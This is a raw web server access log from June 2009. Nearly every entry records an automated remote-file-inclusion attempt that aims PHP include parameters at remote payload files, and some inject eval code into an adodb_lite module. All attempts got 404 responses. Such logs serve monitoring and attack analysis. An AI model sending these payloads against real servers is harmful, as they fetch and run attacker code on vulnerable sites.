80.93.50.112 - - [27/Jun/2009:00:35:45 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:35:45 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:35:46 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:36:15 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:36:15 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:36:15 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:36:15 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:36:29 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:36:52 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:36:56 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:37:35 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:37:35 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:37:35 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:37:35 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:38:20 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
38.117.93.134 - - [27/Jun/2009:00:41:16 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
38.117.93.134 - - [27/Jun/2009:00:41:16 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
96.9.180.229 - - [27/Jun/2009:00:43:39 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:43:39 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:43:39 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:43:40 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:43:58 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:43:58 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:43:58 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:44:09 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:44:10 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:00:44:32 -0500] "GET /logs//include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:00:44:32 -0500] "GET //include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:00:44:35 -0500] "GET /logs/access_log.1239408000//include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.249.68.42 - - [27/Jun/2009:00:45:01 -0500] "GET /logs/access_log.1224720000 HTTP/1.1" 200 21681 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [27/Jun/2009:00:45:34 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.2.38 - - [27/Jun/2009:00:45:34 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
213.189.2.38 - - [27/Jun/2009:00:45:34 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:45:38 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:45:38 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:45:38 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.208.131 - - [27/Jun/2009:00:45:40 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.43.195.120 - - [27/Jun/2009:00:45:52 -0500] "GET /logs/access_log.1239753600//include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:46:17 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:46:17 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:46:18 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:46:29 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
213.189.2.38 - - [27/Jun/2009:00:46:46 -0500] "GET /logs/access_log.1240531200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
213.189.2.38 - - [27/Jun/2009:00:46:46 -0500] "GET /logs/access_log.1238371200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:03 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:08 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:08 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:47:21 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:47:21 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:47:21 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:22 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:22 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:22 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:22 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:47:25 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:47:25 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:47:25 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:00:47:36 -0500] "GET //include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:00:47:36 -0500] "GET /logs/access_log.1239408000//include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:00:47:39 -0500] "GET /logs//include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:40 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:40 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:40 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:00:47:40 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:48:03 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:48:05 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
80.68.200.220 - - [27/Jun/2009:00:48:08 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.106.192 - - [27/Jun/2009:00:48:25 -0500] "GET /logs/access_log.1196294400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.195.120 - - [27/Jun/2009:00:48:32 -0500] "GET /logs/access_log.1239753600//include.php?path[docroot]=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
38.117.93.134 - - [27/Jun/2009:00:49:30 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
38.117.93.134 - - [27/Jun/2009:00:49:30 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:00:50:07 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:00:50:07 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:00:50:07 -0500] "GET /e404.php?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:00:50:07 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.121.137.51 - - [27/Jun/2009:00:54:11 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
91.121.137.51 - - [27/Jun/2009:00:54:11 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
91.121.137.51 - - [27/Jun/2009:00:54:11 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:00:54:17 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:00:54:17 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:00:54:17 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
91.121.137.51 - - [27/Jun/2009:00:54:19 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:00:54:22 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
58.227.193.198 - - [27/Jun/2009:00:55:16 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.227.193.198 - - [27/Jun/2009:00:55:16 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.227.193.198 - - [27/Jun/2009:00:55:48 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
58.227.193.198 - - [27/Jun/2009:00:56:06 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
38.117.93.134 - - [27/Jun/2009:00:57:36 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
38.117.93.134 - - [27/Jun/2009:00:57:36 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
65.55.106.170 - - [27/Jun/2009:00:57:55 -0500] "GET /logs/access_log.1193356800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.223.3.98 - - [27/Jun/2009:00:58:21 -0500] "GET /logs//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:21 -0500] "GET /logs/access_log.1238716800//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:21 -0500] "GET //xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:23 -0500] "GET //xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:24 -0500] "GET /logs//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:24 -0500] "GET /logs/access_log.1238716800//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:31 -0500] "GET /logs/access_log.1237248000//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:00:58:34 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:00:58:34 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:00:58:34 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:00:58:34 -0500] "GET /logs/access_log.1237248000//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:00:58:36 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:01:04 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:01:04 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:01:04 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:01:15 -0500] "GET //xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:01:15 -0500] "GET /logs//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:01:15 -0500] "GET /logs/access_log.1238716800//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.223.3.98 - - [27/Jun/2009:01:01:15 -0500] "GET /logs/access_log.1237248000//xfsection/modify.php?dir_module=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
82.194.87.219 - - [27/Jun/2009:01:01:31 -0500] "GET /logs//db.php?commonpath=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 295 "-""libwww-perl/5.822"
218.150.78.245 - - [27/Jun/2009:01:01:46 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:01:01:47 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:01:01:47 -0500] "GET /logs/access_log.1238025600//modules/xfsection/modify.php?dir_module=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:01:01:47 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:02:31 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:02:31 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:02:32 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:03:18 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:03:18 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:03:18 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:03:32 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:01:03:50 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.194.87.219 - - [27/Jun/2009:01:06:55 -0500] "GET /logs///db.php?commonpath=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 296 "-""libwww-perl/5.822"
163.17.8.18 - - [27/Jun/2009:01:10:21 -0500] "GET /logs/access_log.1237420800//admin/classes/TplLoad.php?full_path_to_public_program=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:01:13:36 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:01:13:36 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
